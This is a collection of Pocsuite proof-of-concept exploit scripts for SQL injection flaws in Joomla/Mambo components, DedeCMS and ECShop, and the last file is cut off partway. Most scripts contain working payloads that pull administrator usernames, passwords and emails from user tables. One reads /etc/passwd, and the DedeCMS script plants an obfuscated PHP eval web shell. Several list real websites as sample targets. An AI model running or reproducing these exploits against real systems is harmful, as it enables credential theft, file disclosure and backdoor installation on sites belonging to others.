3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '75964' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2012-11-21'
13 | createDate = '2016-01-22'
14 | updateDate = '2016-01-22'
15 | references = ['http://www.seebug.org/vuldb/ssvid-75964']
16 | name = 'Joomla Kunena Component (index.php, search parameter) SQL Injection'
17 | appPowerLink = 'http://www.kunena.org/ '
18 | appName = 'Joomla Kunena Component'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla Kunena组件在index.php的参数search由于过滤不严格,导致出现SQL注入漏洞。
23 | 远程攻击者可以利用该漏洞执行SQL指令。该漏洞验证的POC格式如下(计算md5(1)):
24 |
25 | http://XXX/index.php?option=com_kunena&func=userlist&search=%' and 1=2)
26 | union select 1, 1,md5(1),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users-- ;
27 | '''
28 | samples = ['http://www.nakhonbanguns.com']
29 |
30 | def _attack(self):
31 | #利用SQL注入读取joomla管理员信息
32 | result = {}
33 | #访问的地址
34 | exploit='/index.php?option=com_kunena&func=userlist&search='
35 | #利用Union方式读取信息
36 | payload="%' and 1=2) union select 1, 1,concat(0x247e7e7e24,username,"\
37 | "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),1,1,1,1,1,1,1,0,0,0,1,1 from jos_users limit 0,1-- ;"
38 | #构造漏洞利用连接
39 | vulurl=self.url+exploit+payload
40 | #自定义的HTTP头
41 | httphead = {
42 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
43 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
44 | 'Connection':'keep-alive'
45 | }
46 | #提取信息的正则表达式
47 | parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
48 | #发送请求
49 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
50 | #检查是否含有特征字符串
51 | if '$~~~$' in resp.content:
52 | #提取信息
53 | match=re.search(parttern,resp.content,re.M|re.I)
54 | if match:
55 | #漏洞利用成功
56 | result['AdminInfo']={}
57 | #用户名
58 | result['AdminInfo']['Username']=match.group(1)
59 | #密码
60 | result['AdminInfo']['Password']=match.group(2)
61 | #邮箱
62 | result['AdminInfo']['Email']=match.group(3)
63 | return self.parse_output(result)
64 | def _verify(self):
65 | #通过计算md5(3.1415)的值,来验证SQL注入
66 | result = {}
67 | #访问的地址
68 | exploit='/index.php?option=com_kunena&func=userlist&search='
69 | #利用union的方式(计算md5(3.1415))
70 | payload="%' and 1=2) union select 1, 1,md5(3.1415),1,1,1,1,1,1,1,0,0,0,1,1-- ;"
71 | #构造漏洞利用连接
72 | vulurl=self.url+exploit+payload
73 | #自定义的HTTP头
74 | httphead = {
75 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
76 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
77 | 'Connection':'keep-alive'
78 | }
79 | #发送请求
80 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
81 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
82 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
83 | #漏洞验证成功
84 | result['VerifyInfo']={}
85 | result['VerifyInfo']['URL'] = self.url+exploit
86 | result['VerifyInfo']['Payload'] = payload
87 | return self.parse_output(result)
88 |
89 | def parse_output(self, result):
90 | #parse output
91 | output = Output(self)
92 | if result:
93 | output.success(result)
94 | else:
95 | output.fail('Internet nothing returned')
96 | return output
97 |
98 |
99 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '84553' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2011-02-16'
13 | createDate = '2016-01-25'
14 | updateDate = '2016-01-25'
15 | references = ['http://www.seebug.org/vuldb/ssvid-84553']
16 | name = 'Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla! and Mambo com_lexikon Component'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla! and Mambo com_lexikon组件的参数 id 过滤不严,导致出现SQL注入漏洞。
23 |
24 | 该漏洞的POC格式如下:
25 | http://www.example.com/index.php?option=com_lexikon&id=-1/**/union/**/select
26 | /**/concat(username,0x3a,password),concat(username,0x3a,password),concat
27 | (username,0x3a,password) from mos_users--+
28 | '''
29 | samples = ['http://www.deutsche-handwerker.info']
30 |
31 | def _attack(self):
32 | #利用SQL注入读取joomla管理员信息
33 | result = {}
34 | #访问的地址
35 | exploit='/index.php?option=com_lexikon&id='
36 | #利用Union方式读取信息
37 | payload=("-1 union select 1,concat(0x247e7e7e24,username"
38 | ",0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),3 from mos_users limit 0,1--+")
39 | #构造漏洞利用连接
40 | vulurl=self.url+exploit+payload
41 | #自定义的HTTP头
42 | httphead = {
43 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
44 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
45 | 'Connection':'keep-alive'
46 | }
47 | #提取信息的正则表达式
48 | parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
49 | #发送请求
50 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
51 | #检查是否含有特征字符串
52 | if '$~~~$' in resp.content:
53 | #提取信息
54 | match=re.search(parttern,resp.content,re.M|re.I)
55 | if match:
56 | #漏洞利用成功
57 | result['AdminInfo']={}
58 | #用户名
59 | result['AdminInfo']['Username']=match.group(1)
60 | #密码
61 | result['AdminInfo']['Password']=match.group(2)
62 | #邮箱
63 | result['AdminInfo']['Email']=match.group(3)
64 | return self.parse_output(result)
65 |
66 | def _verify(self):
67 | #通过计算md5(3.1415)的值,来验证SQL注入
68 | result = {}
69 | #访问的地址
70 | exploit='/index.php?option=com_lexikon&id='
71 | #利用union的方式(计算md5(3.1415))
72 | payload="-1 union select 1,md5(3.1415),3--+"
73 | #构造漏洞利用连接
74 | vulurl=self.url+exploit+payload
75 | #自定义的HTTP头
76 | httphead = {
77 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
78 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
79 | 'Connection':'keep-alive'
80 | }
81 | #发送请求
82 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
83 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
84 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
85 | #漏洞验证成功
86 | result['VerifyInfo']={}
87 | result['VerifyInfo']['URL'] = self.url+exploit
88 | result['VerifyInfo']['Payload'] = payload
89 | return self.parse_output(result)
90 |
91 | def parse_output(self, result):
92 | #parse output
93 | output = Output(self)
94 | if result:
95 | output.success(result)
96 | else:
97 | output.fail('Internet nothing returned')
98 | return output
99 |
100 |
101 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Component (com_idoblog) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '70468' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2010-12-25'
13 | createDate = '2016-01-23'
14 | updateDate = '2016-01-23'
15 | references = ['http://www.seebug.org/vuldb/ssvid-70468']
16 | name = 'Joomla Component (com_idoblog) SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla Component (com_idoblog)'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla 组件(com_idoblog)对参数userid过滤不严格,导致出现SQL注入漏洞。
23 | 远程攻击者无需登陆,可以利用该漏洞执行SQL指令。
24 |
25 | 利用updatexml报错回显方式读取数据库版本的POC如下所示:
26 |
27 | http://xxx.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=-1
28 | or 1=(updatexml(1,concat(0x3a,version()),1))
29 | '''
30 | samples = ['http://www.aca2k.org']
31 |
32 | def _attack(self):
33 | #利用floor注入读取MySQL数据库信息
34 | result = {}
35 | #访问的地址
36 | exploit='/index.php?option=com_idoblog&task=profile&Itemid=&userid='
37 | #利用floor方式读取信息
38 | payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
39 | "user(),0x2a2a2a,version(),0x247e7e7e24,FLOOR(RAND(0)*2))x FROM "\
40 | "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
41 | #构造漏洞利用连接
42 | vulurl=self.url+exploit+payload
43 | #自定义的HTTP头
44 | httphead = {
45 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
46 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
47 | 'Connection':'keep-alive'
48 | }
49 | #提取信息的正则表达式
50 | parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
51 | #发送请求
52 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
53 | #检查是否含有特征字符串
54 | if 'Duplicate entry' in resp.content:
55 | #提取信息
56 | match=re.search(parttern,resp.content,re.M|re.I)
57 | if match:
58 | #漏洞利用成功
59 | result['DbInfo']={}
60 | #数据库用户名
61 | result['DbInfo']['Username']=match.group(1)
62 | #数据库版本
63 | result['DbInfo']['Version']=match.group(2)
64 | return self.parse_output(result)
65 |
66 | def _verify(self):
67 | #通过floor方式计算md5(3.1415)的值,来验证SQL注入
68 | result = {}
69 | #访问的地址
70 | exploit='/index.php?option=com_idoblog&task=profile&Itemid=&userid='
71 | #利用floor的方式(计算md5(3.1415))
72 | payload="-1 or 1=(SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x247e7e7e24,"\
73 | "md5(3.1415),FLOOR(RAND(0)*2))x FROM "\
74 | "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
75 | #构造漏洞利用连接
76 | vulurl=self.url+exploit+payload
77 | #自定义的HTTP头
78 | httphead = {
79 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
80 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
81 | 'Connection':'keep-alive'
82 | }
83 | #发送请求
84 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
85 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
86 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
87 | #漏洞验证成功
88 | result['VerifyInfo']={}
89 | result['VerifyInfo']['URL'] = self.url+exploit
90 | result['VerifyInfo']['Payload'] = payload
91 | return self.parse_output(result)
92 |
93 | def parse_output(self, result):
94 | #parse output
95 | output = Output(self)
96 | if result:
97 | output.success(result)
98 | else:
99 | output.fail('Internet nothing returned')
100 | return output
101 |
102 |
103 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '86077' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2009-02-24'
13 | createDate = '2016-01-20'
14 | updateDate = '2016-01-20'
15 | references = ['http://www.sebug.net/vuldb/ssvid-86077']
16 | name = 'Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability'
17 | appPowerLink = 'http://www.joomla.org'
18 | appName = 'Joomla! and Mambo gigCalendar Component'
19 | appVersion = '1.0'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | gigCalendar是一个免费的为维护网站旅游日志的的Joomla! and Mambo组件。
23 | Mambo和Joomla! GigCalendar (com_gigcal)组件中存在多个SQL注入漏洞,当magic_quotes_gpc被中止时,远程攻击者
24 | (1)可以借助对index.php的一个细节操作的gigcal _venues_id参数,且该参数没有经过venuedetails.php适当地处理,以执行任意SQL指令;
25 | (2)借助对index.php的一个细节操作中igcal_bands_id参数,且该参数没有经过banddetails.php适当地处理,以执行任意SQL命令。
26 |
27 | 利用的POC格式是:http://XXX.com/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
28 | UNION ALL SELECT 1,2,3,4,5,md5(1),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23
29 | '''
30 | samples = ['http://www.semion.com.sg']
31 |
32 | def _attack(self):
33 | #利用SQL注入读取joomla管理员信息
34 | result = {}
35 | #访问的地址
36 | exploit='/index.php?option=com_gigcal&task=details&gigcal_bands_id='
37 | #利用Union方式读取信息
38 | payload="-1' UNION ALL SELECT 1,2,3,4,5,concat(0x247e7e7e24,username,"\
39 | "0x2a2a2a,password,0x2a2a2a,email,0x247e7e7e24),NULL,NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23"
40 | #构造漏洞利用连接
41 | vulurl=self.url+exploit+payload
42 | #自定义的HTTP头
43 | httphead = {
44 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
45 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
46 | 'Connection':'keep-alive'
47 | }
48 | #提取信息的正则表达式
49 | parttern='\$~~~\$(.*)\*\*\*(.*)\*\*\*(.*)\$~~~\$'
50 | #发送请求
51 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
52 | #检查是否含有特征字符串
53 | if '$~~~$' in resp.content:
54 | #提取信息
55 | match=re.search(parttern,resp.content,re.M|re.I)
56 | if match:
57 | #漏洞利用成功
58 | result['AdminInfo']={}
59 | #用户名
60 | result['AdminInfo']['Username']=match.group(1)
61 | #密码
62 | result['AdminInfo']['Password']=match.group(2)
63 | #邮箱
64 | result['AdminInfo']['Email']=match.group(3)
65 | return self.parse_output(result)
66 |
67 | def _verify(self):
68 | #通过计算md5(3.1415)的值,来验证SQL注入
69 | result = {}
70 | #访问的地址
71 | exploit='/index.php?option=com_gigcal&task=details&gigcal_bands_id='
72 | #利用union的方式(计算md5(3.1415))
73 | payload="-1' UNION ALL SELECT 1,2,3,4,5,md5(3.1415),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23"
74 | #构造漏洞利用连接
75 | vulurl=self.url+exploit+payload
76 | #自定义的HTTP头
77 | httphead = {
78 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
79 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
80 | 'Connection':'keep-alive'
81 | }
82 | #发送请求
83 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
84 | #检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
85 | if '63e1f04640e83605c1d177544a5a0488' in resp.content:
86 | #漏洞验证成功
87 | result['VerifyInfo']={}
88 | result['VerifyInfo']['URL'] = self.url+exploit
89 | result['VerifyInfo']['Payload'] = payload
90 | return self.parse_output(result)
91 |
92 | def parse_output(self, result):
93 | #parse output
94 | output = Output(self)
95 | if result:
96 | output.success(result)
97 | else:
98 | output.fail('Internet nothing returned')
99 | return output
100 |
101 |
102 | register(TestPOC)
--------------------------------------------------------------------------------
/Joomla Jobprofile Component (com_jobprofile) - SQL Injection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '72384' # ssvid
10 | version = '1.0'
11 | author = ['kikay']
12 | vulDate = '2011-12-02'
13 | createDate = '2016-01-22'
14 | updateDate = '2016-01-22'
15 | references = ['http://www.seebug.org/vuldb/ssvid-72384']
16 | name = 'Joomla Jobprofile Component (com_jobprofile) - SQL Injection'
17 | appPowerLink = 'http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html'
18 | appName = 'Joomla Jobprofile Component'
19 | appVersion = 'N/A'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | Joomla Jobprofile 组件 index.php 的参数id由于过滤不严,导致出现SQL注入漏洞。
23 | 远程攻击者可以利用该漏洞执行SQL指令。
24 |
25 | 利用该漏洞计算md5(1)的POC格式如下:
26 |
27 | http://XXX.com/index.php?option=com_jobprofile&Itemid=61&task=profilesview
28 | &id=-1+union+all+select+1,md5(1),3,4,5,6,7,8,9--
29 |
30 | 下面的将分别利用注入漏洞读取joomla管理员口令密码,以及读取/etc/passwd文件的内容。
31 | '''
32 | samples = ['http://www.astellas.cz']
33 |
34 | def _attack(self):
35 | #利用SQL注入读取joomla管理员信息
36 | result = {}
37 | #访问的地址
38 | exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
39 | #利用Union方式读取信息
40 | payload="-1+union+all+select+1,concat(0x247e7e7e24,username,0x2a2a2a,password"\
41 | ",0x247e7e7e24),3,4,5,6,7,8,9+from+jos_users--"
42 | #构造漏洞利用连接
43 | vulurl=self.url+exploit+payload
44 | #自定义的HTTP头
45 | httphead = {
46 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
47 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
48 | 'Connection':'keep-alive'
49 | }
50 | #提取信息的正则表达式
51 | parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
52 | #发送请求
53 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
54 | #检查是否含有特征字符串
55 | if '$~~~$' in resp.content:
56 | #提取信息
57 | match=re.search(parttern,resp.content,re.M|re.I)
58 | if match:
59 | #漏洞利用成功
60 | result['AdminInfo']={}
61 | #用户名
62 | result['AdminInfo']['Username']=match.group(1)
63 | #密码
64 | result['AdminInfo']['Password']=match.group(2)
65 | return self.parse_output(result)
66 |
67 | def _verify(self):
68 | #利用注入漏洞读取/etc/passwd的文件内容
69 | result = {}
70 | #文件名称
71 | filename='/etc/passwd'
72 | #进行16进制编码
73 | hexfilename='0x'+filename.encode('hex')
74 | #访问的地址
75 | exploit='/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id='
76 | #利用Union方式读取信息
77 | payload="-1+union+all+select+1,load_file("+hexfilename+"),3,4,5,6,7,8,9+from+jos_users--"
78 | #构造漏洞利用连接
79 | vulurl=self.url+exploit+payload
80 | #自定义的HTTP头
81 | httphead = {
82 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
83 | 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
84 | 'Connection':'keep-alive'
85 | }
86 | #发送请求
87 | resp=req.get(url=vulurl,headers=httphead,timeout=50)
88 | #判断返回结果
89 | if resp.status_code==200:
90 | match=re.search('root:.+?:0:0:.+?:.+?:.+?', resp.content,re.I|re.M)
91 | #读取文件成功
92 | if match:
93 | result['VerifyInfo'] = {}
94 | result['VerifyInfo']['URL'] = self.url+exploit
95 | result['VerifyInfo']['Payload'] = payload
96 | #记录文件内容
97 | result['Fileinfo']={}
98 | result['Fileinfo']['Filename']=filename
99 | result['Fileinfo']['Content']=match.group(0)+'...'
100 | return self.parse_output(result)
101 |
102 | def parse_output(self, result):
103 | #parse output
104 | output = Output(self)
105 | if result:
106 | output.success(result)
107 | else:
108 | output.fail('Internet nothing returned')
109 | return output
110 |
111 |
112 | register(TestPOC)
--------------------------------------------------------------------------------
/dede_download.php_sqli.php.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase,Output
7 | from pocsuite.utils import register
8 |
9 | class Fuckdede(POCBase):
10 | vulID='1'
11 | version = '1'
12 | author = ['fengxuan']
13 | vulDate = '2016-2-25'
14 | createDate = '2016-2-25'
15 | updateDate = '2016-2-25'
16 | references = ['http://www.evalshell.com', 'http://www.cnseay.com/2963/']
17 | name = 'dedecms plus/download.php 注入漏洞利用EXP'
18 | appPowerLink = 'http://www.dedecms.cn/'
19 | appName = 'dedecms'
20 | appVersion = '5.7'
21 | vulType = 'SQL Injection'
22 | desc = '''
23 | 开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
24 | 带入了SQL语句中,可以通过字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
25 | 此注入为报错注入,可以通过UpdateXML函数进行注入。
26 | '''
27 | samples = ['']
28 |
29 | def _verify(self):
30 | result = {}
31 | target = self.url + "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=120&arrs2[]=117&arrs2[]=97&arrs2[]=110&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35"
32 | response = req.get(target)
33 | content = response.content
34 | if content.find('Safe Alert: Request Error step 2!') > 0:
35 | result = {'VerifyInfo':{}}
36 | result['VerifyInfo']['URL'] = self.url
37 | result['VerifyInfo']['username'] = 'xuan'
38 | result['VerifyInfo']['password'] = 'admin'
39 | return self.parse_result(result)
40 |
41 | def _attack(self):
42 | result = {}
43 | target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
44 | req.get(target)
45 | req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
46 | shell = req.get(self.url + '/plus/x.php')
47 | if shell.content.find('w'):
48 | result = {'VerifyInfo':{}}
49 | result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
50 | result['VerifyInfo']['password'] = 'w'
51 | return self.parse_result(result)
52 |
53 | def parse_result(self, result):
54 | output = Output(self)
55 | if result:
56 | output.success(result)
57 | else:
58 | output.fail("Internet Nothing returned")
59 | return output
60 |
61 | register(Fuckdede)
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
--------------------------------------------------------------------------------
/ECShop支付宝插件SQL注入漏洞.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | import re
4 | import urllib
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import POCBase, Output
8 | from pocsuite.utils import register
9 |
10 |
11 | class TestPOC(POCBase):
12 | vulID = 'SSV-60643'
13 | version = '1'
14 | author = '0x153'
15 | vulDate = '2013-02-22'
16 | createDate = '2015-10-15'
17 | updateDate = '2015-10-15'
18 | references = ['http://www.sebug.net/vuldb/ssvid-60643','http://www.tuicool.com/articles/vauaMz','http://www.waitalone.cn/ecshop-alipay-plug-injected-exp.html']
19 | name = 'ECShop支持宝插件SQL注入漏洞'
20 | appPowerLink = 'www.ecshop.com'
21 | appName = 'ECShop'
22 | appVersion = '2.7.3'
23 | vulType = 'SQL Injection'
24 | desc = '''
25 | ECShop支持宝插件SQL注入漏洞
26 | '''
27 |
28 | samples = ['']
29 |
30 | '''
31 | 获取标准url
32 | @param url 需要转化的url
33 | '''
34 | def get_standard_url(self,data,url):
35 | if url.count("http") != 0:
36 | if url[-1] == '/': #http://www.xxoo.com/
37 | url = "%s%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
38 | else: #http://www.xxoo.com
39 | url = "%s/%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
40 | else:
41 | if url[-1] == '/': #www.xxoo.com/club/
42 | url = "http://%s%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
43 | else: #www.xxoo.com/club
44 | url = "http://%s/%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
45 | return url
46 |
47 | '''
48 | 获取表前缀
49 | @param url 目标主机的url
50 | '''
51 | def get_table_pre(self,url):
52 | data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name) from information_schema.tables where table_schema=database() limit 1))a from information_schema.tables group by a)b%23"
53 | url = self.get_standard_url(data,url)
54 |
55 | pattern = re.compile(r"Duplicate entry '[0,1]?(.+?)[0,1]?'")
56 |
57 | '''
58 | 使用这种注入方式存在一定不确定性,需要多循环几次
59 | '''
60 | for i in range(10):
61 | r = req.get(url)
62 | ret = pattern.findall(r.content)
63 | if ret:
64 | if ret[0].count('ecs') != 0:
65 | return 'ecs'
66 | else:
67 | return ret[0][0:ret[0].index('_')]
68 | return None
69 |
70 | '''
71 | 注入攻击代码
72 | @param url 目标主机的url
73 | @param count 爆数据的参数,default=0
74 | @param table_pre 数据库表前缀
75 | '''
76 | def _attack(self):
77 | try:
78 | result ={}
79 | #获取表前缀
80 | table_pre = self.get_table_pre(self.url)
